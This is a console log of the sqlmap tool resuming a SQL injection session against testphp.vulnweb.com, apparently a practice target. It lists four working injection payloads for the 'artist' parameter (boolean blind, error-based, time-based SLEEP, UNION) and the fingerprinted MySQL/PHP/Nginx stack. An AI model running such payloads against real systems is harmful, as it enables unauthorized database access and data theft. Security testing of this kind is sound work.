        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.10.2#stable}
|_ -| . [']     | .'| . |
|___|_  [']_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 03:28:10 /2026-02-28/

[03:28:10] [INFO] resuming back-end DBMS 'mysql' 
[03:28:11] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: artist (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: artist=1 AND 2037=2037

    Type: error-based
    Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
    Payload: artist=1 AND EXTRACTVALUE(5204,CONCAT(0x5c,0x716a787671,(SELECT (ELT(5204=5204,1))),0x717a627871))

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: artist=1 AND (SELECT 2239 FROM (SELECT(SLEEP(5)))jUiH)

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: artist=-8003 UNION ALL SELECT NULL,CONCAT(0x716a787671,0x546a516a72467872706c43746d737962755275564e4b4e54576b445643494a44416d464f52624f4f,0x717a627871),NULL-- -
---
[03:28:12] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: PHP 5.6.40, Nginx 1.19.0
back-end DBMS: MySQL >= 5.1
[03:28:12] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/testphp.vulnweb.com'

[*] ending @ 03:28:12 /2026-02-28/

